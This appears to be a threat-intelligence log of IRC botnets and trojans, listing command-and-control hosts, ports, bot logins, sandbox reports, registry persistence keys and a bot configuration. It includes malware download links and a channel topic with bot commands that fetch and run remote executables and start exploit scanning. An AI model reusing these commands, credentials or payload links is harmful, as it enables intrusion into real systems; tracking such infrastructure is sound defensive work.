Remote Host    Port Number
87.98.179.1    25
87.98.179.1    6667

NICK [UserName|821|United-States]
NICK username1
PONG :4CA947ED
PRIVMSG #barbiesrule :kh12795@gmail.com
USER Win32-Liquid Victim #821 * :http://liquid-security.net
JOIN #barbiesrule 3l173
PRIVMSG #barbiesrule :[Screenshot] Screen capture sent to kh12795@gmail.com.
PRIVMSG #barbiesrule :[Login] I'm already owned by Shockwave!
NICK [UserName|7114|United-States]
PRIVMSG #barbiesrule :[Login] I'm at your service, Shockwave.
Now talking in
unassigned.calpop.com (botnet hosted in United States Los Angeles Calpop.com Inc)
Remote Host       Port Number
216.178.38.224    80
63.135.80.46      80
64.208.241.41     80
66.220.149.11     80
64.27.1.118       1866

PASS xxx
NICK NEW-[USA|00|P|81244]
USER XP-1086 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|81244] -ix
JOIN #!high! test
PONG 22
MOTD

info about hosting: http://whois.domaintools.com/64.27.1.118
56youku.3322.org (Trojan-Banker.Win32.Banker hosted in China Guangdong Chinanet Guangdong Province Network)
56youku.3322.org DNS_TYPE_A 183.7.66.173
TCP Connection Attempts: 183.7.66.173:8000

Suspicious Actions Detected:
  Copies self to other locations
  Creates and executes scripts
  Creates files in windows system directory
  Creates system services or drivers

exe file: http://ct.ftpvpn.info:3355/yuhaimin/windsca.exe
anubis scan: http://anubis.iseclab.org/?action=result&task_id=1ef1923bf055827246da05311ccd4a263&format=html
info about hosting: http://whois.domaintools.com/183.7.66.173
bad-girl.no-ip.biz (bifrose hosted in Germany Bremen Ewe-tel)
Resolved: [bad-girl.no-ip.biz] To [91.97.55.200]

Remote Host     Port Number
91.97.55.200    58281

Registry Modifications

The following Registry Key was created:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{E3FB2449-64ED-226C-A731-D39F73A3069B}

The newly created Registry Values are:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{E3FB2449-64ED-226C-A731-D39F73A3069B}]
StubPath = "%System%\svhost32.exe"
so that svhost32.exe runs every time Windows starts
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
Windows Host Prozess = "%System%\svhost32.exe"
so that svhost32.exe runs every time Windows
50.22.148.142 (linux bots hosted in United States Dallas Softlayer Technologies Inc)
var $config = array("server"=>"50.22.148.142",
                    "port"=>1345,
                    "pass"=>"",
                    "prefix"=>"ClickDown",
                    "maxrand"=>4,
                    "chan"=>"#dada",
                    "key"=>"",
                    "modes"=>"+s",
                    "password"=>"click",
                    "trigger"=>".",
                    "hostauth"=>"*" // * for any hostname
                    );

Invisible Users: 31
Channels: 1 channels formed
Clients: I have 32 clients and 0 servers
Local users: Current Local Users: 32 Max: 779
Global users: Current Global Users: 32 Max: 288

download link here: http://50.22.148.142/pepinas.txt?
blenderartists (gbot hosted in United States San Antonio Slicehost)
DNS Queries
DNS Query Text
blenderartists.org IN A +
zonetf.com IN A +
zonedg.com IN A +
freeonlinedatingtips.net: type A, class IN, addr 69.42.208.146
bigspiderwomen.com: type A, class IN, addr 64.191.90.101
sharewareconnection.com: type A, class IN, addr 216.240.159.81

HTTP Queries
HTTP Query Text
zonetf.com POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSvfuFuTLiv0agDgGxMl%2FvDr3WCGkrg%2B8OtBfBvOZTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D HTTP/1.1
blenderartists.org GET /external/Banners/facebook2.jpg?tq=gHZutDyMv5rJcyG1J8K%2B1MWCJbP4lltXIA%3D%3D HTTP/1.0
zonedg.com GET /images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0ujbwvgS917W65rJqlLfgPiWW1cg HTTP/1.0

Threads Created
PId
a1b.dyndns.tv (botnet hosted in Malaysia Kuala Lumpur Piradius Net)
Remote Host        Port Number
124.217.248.138    20

PASS google_cache2.tmp
NICK n{Ganja-USA|XP}752152
USER 5074 "" "TsGh" :5074
JOIN #panama
PONG :irc.sdfadsf.com

another dns same ip:

DNS Queries:
Name                    Query Type    Query Result       Successful    Protocol
security10.sytes.net    DNS_TYPE_A    124.217.248.138    YES           udp

IRC Conversations:
From ANUBIS:1039 to 124.217.248.138:20
Nick: n{Ganja-AUT|XP}731969
Username: 0359
Server Pass: google_cache2.tmp
Joined Channel: #mexico
jjjjjj.ahrampress.net (botnet hosted in China Beijing Chinanet Hebei Province Network)
jjjjjj.ahrampress.net ip: 123.183.217.32
jjjjjj.ahrampress.net:6943
123.183.217.32 5943
123.183.217.32 6943

PASSWORD: eee
Nick [N00_USA_XP_39922187]
rssr SP2-917 * 0 :COMPUTERNAME
Now talking in #j
Channel: #j
Topic is '.r.getfile -S|.r.getfile http://61.136.59.34/LWC/img/mheader.png C:\radr.exe 1|.asc -S|.http http://61.136.59.34/LWC/dc0.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0
dc.drwhox.com (botnet hosted in China Beijing Chinanet Hebei Province Network)
Remote Host       Port Number
112.78.112.208    80
218.85.133.201    80
61.136.59.34      80
123.183.217.32    5943
123.183.217.32    6943
27.54.225.102     6943

PRIVMSG #dc1 :Err0r..
MODE [N00_USA_XP_7890652] @ -ix

00000030 | 5F36 3033 3038 3139 5D18 E740 0D0A 7365 | _6030819]..@..se
00000040 | 6E64 2023 6A2C 234D 6120 6F6F 6F6F 0D0A | nd #j,#Ma oooo..
00000050 | 5052 5256 4D53 4720
irc.racrew.info (linux perl bots hosted in United States Arkadelphia Ezclick.net Inc)
irc connection:
$servidor='75.46.208.5' unless $servidor;
my $porta='9191';

Channels: 5 channels formed
Clients: I have 103 clients and 0 servers
Local users: Current Local Users: 103 Max: 143
Global users: Current Global Users: 103 Max: 417

bot link: http://80.73.145.20/seguridad/c.txt
downloader link: http://80.73.145.20/seguridad/ec.txt?
rabot.txt: http://80.73.145.20/seguridad/rabot.txt
info about hosting: http://whois.domaintools.com/75.46.208.5